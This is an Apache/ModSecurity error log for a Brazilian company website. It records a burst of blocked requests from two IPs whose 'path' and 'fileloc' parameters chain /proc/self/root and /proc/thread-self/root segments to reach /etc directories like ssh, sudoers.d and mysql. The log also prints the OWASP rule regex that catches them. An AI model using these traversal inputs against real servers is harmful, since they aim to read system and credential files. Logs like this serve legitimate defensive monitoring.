[Wed Mar 18 09:55:59.843116 2026] [:error] [pid 30077:tid 140411691570944] [client 74.7.243.128:33502] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqg3_u8EFLIOrSqIpv8bwAAAkY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:56:03.805222 2026] [:error] [pid 15051:tid 140411725141760] [client 74.7.243.128:35718] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqg4ymAPhZkrhU8w4lkZgAAAII"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:56:06.063935 2026] [:error] [pid 11816:tid 140411557287680] [client 74.7.243.128:35732] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqg5ew_le52K8_3pV3W8wAAAhY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:56:07.451788 2026] [:error] [pid 26799:tid 140411658000128] [client 74.7.243.128:35734] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqg59a6ubjKNq_cu4aQ-gAAA0o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:56:12.347262 2026] [:error] [pid 29882:tid 140411540502272] [client 74.7.243.128:35738] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqg7EzinOy1jxa1j4cLqwAAARg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:56:13.665314 2026] [:error] [pid 19507:tid 140411733534464] [client 74.7.243.128:33462] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqg7dY0UrI5A3LftIycgQAAAYE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:56:18.504922 2026] [mime_magic:error] [pid 31803:tid 140411725141760] (70014)End of file found: [client 74.7.243.128:33472] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self
[Wed Mar 18 09:56:43.192305 2026] [:error] [pid 15826:tid 140411716749056] [client 74.7.241.31:41516] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqhC-oXxyEfFpUF8f9lzwAAAUM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:57:04.725298 2026] [:error] [pid 29882:tid 140411557287680] [client 74.7.241.31:51786] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqhIEzinOy1jxa1j4cL0AAAARY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:57:27.747774 2026] [:error] [pid 15051:tid 140411599251200] [client 74.7.243.128:33478] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqhNymAPhZkrhU8w4lkxAAAAJE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:57:29.034285 2026] [:error] [pid 26799:tid 140411632822016] [client 74.7.243.128:42118] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqhOda6ubjKNq_cu4aRKAAAA00"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:57:34.227247 2026] [:error] [pid 26799:tid 140411683178240] [client 74.7.243.128:46026] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqhPta6ubjKNq_cu4aRMQAAA0c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:57:35.587997 2026] [:error] [pid 17653:tid 140411599251200] [client 74.7.243.128:46040] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqhP8df6f5d65gmYZTMjwAAAtE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:57:36.923039 2026] [:error] [pid 19507:tid 140411624429312] [client 74.7.243.128:46048] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqhQNY0UrI5A3LftIycxQAAAY4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:57:42.128343 2026] [:error] [pid 29882:tid 140411590858496] [client 74.7.243.128:46064] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqhRkzinOy1jxa1j4cL7wAAARI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:58:05.517968 2026] [:error] [pid 30077:tid 140411632822016] [client 74.7.243.128:46312] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqhXfu8EFLIOrSqIpv8vQAAAk0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:58:06.876574 2026] [:error] [pid 15051:tid 140411565680384] [client 74.7.243.128:32882] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqhXimAPhZkrhU8w4lk0AAAAJU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:58:08.129264 2026] [:error] [pid 26799:tid 140411540502272] [client 74.7.243.128:32890] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqhYNa6ubjKNq_cu4aRPgAAA1g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:58:10.487761 2026] [:error] [pid 15826:tid 140411674785536] [client 74.7.243.128:57156] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqhYuoXxyEfFpUF8f9l7wAAAUg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:58:11.891413 2026] [:error] [pid 31803:tid 140411616036608] [client 74.7.243.128:57172] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqhY-yqAr6etmhZHNq3AAAAAE8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:58:13.269151 2026] [:error] [pid 17653:tid 140411540502272] [client 74.7.243.128:57178] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqhZcdf6f5d65gmYZTMmwAAAtg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:58:14.607526 2026] [:error] [pid 19507:tid 140411607643904] [client 74.7.243.128:57180] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqhZtY0UrI5A3LftIyc0wAAAZA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
